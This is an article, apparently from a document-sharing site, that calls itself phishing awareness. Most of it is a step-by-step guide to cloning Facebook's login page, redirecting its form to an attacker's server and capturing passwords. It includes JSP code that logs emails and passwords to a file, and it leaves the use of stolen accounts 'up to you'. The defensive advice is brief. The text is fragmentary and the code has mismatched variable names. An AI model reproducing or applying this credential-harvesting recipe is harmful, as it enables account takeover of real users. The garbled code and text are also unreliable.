Académique Documents
Professionnel Documents
Culture Documents
Sisay A. Chala
In this article, I will try to show how phishing, a technique that eludes users to provide information to
unintended recipient, is launched and how to defend yourself against such attack.
A few days ago, I received a Whatsapp message from a friend. As shown in Figure 7, the message (in
German) states that my friend won a voucher worth 250 and I should also click the given link to get a
voucher of same worth. Then I decided to share my thoughts. I hope that reading through this article helps
you tell if the message you receive is genuine or not.
Warning!
At the end of this article, I hope that the reader is able to apply phishing to hack a target user.
However, it is important to note that hacking is a crime! This material is solely aimed at sharing
knowledge for academic purpose with the intention of informing readers how to defend against
phishing attacks. The author will not bear any direct (or implied) responsibilities to damages on you
or the user you attacked. Try it at your own risk!
I. What is Phishing?
Phishing is the process by which a user is tricked to provide information to the attackers. Phishers
use email, telephone or messages to entice, scare or urge a user so that the user gives personal
details, credit card number, username and passwords or any other private information. The
commonest phishing attack happens when a user receives an email (or other form of message) that
promises a user something appealing and trick the user to click a link they say is reputable but that
takes the user to a website controlled by the criminal. For example, the user may be given a link that
the attacker claims is the bank website but the link takes the user to another address.
The attackers use techniques called social engineering that exploit user's ego, fear, or greed to trick
the user. They may come in the form of financial promises, travel promises, system update
warnings, etc. In a nutshell, phishing attack is an attack launched by the help of the victim in most
cases.
Attackers may also use malicious software that is embedded into websites, pirated software, images,
etc. that run in the system without the awareness of the user. These software may capture everything
the user types, screenshots or even take the picture of the user through webcams and transfer this
information to the attacker. They may also force the user's browsers to open the phishing site where
the user will give private information.
Reports by Anti-Phishing Working Group show that phishing attack is growing at an alarming rate
and that in the first quarter of 2016 alone, it grew by 250% i
i http://docs.apwg.org/reports/apwg_trends_report_q1_2016.pdf
target user and ways to defend yourself in the likely event of you being a target.
This article helps users increase their security awareness while using the Internet by:
1. helping users understand the risks of clicking a link in relation to phishing attack,
2. advising users to be cautious of the links they see on messages, emails and other contents
they receive before opening them,
3. advising users to be cautious of the web pages they browse and the URLs to which they are
redirected to,
4. showing some tricks that are used by hackers to circumvent user's cautions in URL names,
and personalized messages,
5. showing those who aspire to be security professionals on how easily phishing can be
performed.
The procedure of how phishing attack works shown in Figure 1 is described in the following six
steps:
1) Prepare a content that appeals, or urges the user for action. See the following example:
Dear Mr. Gullible User,
I have been following your posts on facebook. The points you have been
raising are very interesting.
.
.
.
I want to follow your footsteps and write few posts on regular basis. I
have written my first post that I think is interesting for you too. As I
would like to get your insightful advice, can you please spare a little
of your precious time to see my post and give me your feedback?
Click here to get to the post.
Yours sincerely,
Naughty Guy
2) Now prepare the fake web page that looks exactly like the actual web page, Facebook ii in
ii There is no intention to take Facebook as a target, it is used only as an example because it is used by many users
this case. The target user is sent the above message with the link directing the user to this
fake web page which is controlled by the criminal. The criminal may have written code to
direct the user to the actual web page after capturing what they want. In this case, the user
may not even know what happened in between.
To create the fake web page that exactly looks like the actual page, the easy short-cut is to
save the actual page and edit part of the code that communicates with the server side
application. In this example, let us save the Facebook front page and edit part of the code.
Now, right-click on the page and click view page source from the menu that appears and
search for text action= in the source to get to get the following.
This is the part of the code that sends the user name (i.e., email or phone in the case of
facebook) and password to the server side application.
All you need to do to redirect the user information is to replace the url
https://www.facebook.com/login.php?login_attempt=1&lwv=110 with your own url
that we will create in step 3.
Now, you save the modified page on your server (or upload it to a hosting site. But be
careful, most hosting sites do not allow phishing!), put the link to the new file into the
message you created in step 1 and get ready to send it to the victim.
3) Now create the server side application that captures the user inputs from the fake page we
created in step 2, saves the content and redirects the user to the actual Facebook site with
content to verify the password. To do that, you need names of two variables that will hold
the email and password from the web page. In the page source you got in step 2, just near
where you edited the value of action, you will find two input elements for email and
password as name=email and name=pass, respectively. Then use these names in the
server side application code.
Here is an example code in Java Server Page (JSP) for server side application that captures the form
inputs.
<%@ page import="java.io.*" %>
<%@ page import="javax.sevlet.http.*"%>
<HTML>
<HEAD>
</HEAD>
<BODY>
<H1>This is a Test</H1>
<!-- Here comes some content-->
<BR>
<BR>
<%
String email_inupt = request.getParameter("email");
String pass_inupt = request.getParameter("pass");
String file = application.getRealPath("data.txt");
FileWriter filewriter = new FileWriter(file, true);
filewriter.write("<B>Email: </B>" + email_input + "<BR>");
filewriter.write("<B>Password: </B>" + pass_input + "<BR><BR>\n");
filewriter.close();
%>
<!--jsp:include page="test.txt" flush="true"/-->
<% String redirectURL = "http://www.facebook.com";
response.sendRedirect(redirectURL);%>
</BODY>
</html>
4) Upload the files to the web server. Make sure that on your server (or the folder in the hosting
siteiii), you have two files: one facing the user (i.e., the facebook page) that you created on
step 2 and another server side application that you created on step 3. Now update the
message you created in step 1 to include the link (that you want the user to click) to point to
the fake page you saved.
5) Now you are ready to send the message to the user and launch phishing attack. Send the
message and watch the content of the file that the server side application created.
6) The last step is, to use the data collected? Did you want to use the login information to get
access to their accounts? Did you want to publish account information on websites and make
news? :-) That is up to you!
Check URL
In the email that contains the link, attackers try to make sure to send message that looks
natural. To do this, first they study the target user, i.e., his/her interactions, needs, activities,
connections, You can find such emails on anti-social-engineering websites such as hoax-
slayeriii For example, your Facebook status update gives them a lot of information to create a
personalized message that you (or your friends or relatives) will believe and get fooled.
Address bar
Check URL
iii http://www.hoax-slayer.com/
Figure 7: Whatsapp message offering a voucher worth 250
Because attackers may trick your friends/colleagues to send you the message, it is wise to
use your instinct when you receive messages that have something suspicious irrespective of
whether or not you know (and trust) the sender.
Remember: NO credible company requests you to provide personal information via email.
Most of all, NO company asks you for password!
If you notice any of the above (or anything else that is suspicious), be cautions. The baseline is to
always remember that there is NO FREE MONEY!
V. Conclusion
This article briefly discusses one of the commonest cyber attacks phishing attack and provides
steps-by-step procedure of how to implement and execute the attack. The article also highlights
methods used by criminals to lure victims into unintended website. It concludes by providing tricks
to avoid these attacks.
Further Reading
http://computer.howstuffworks.com/phishing.htm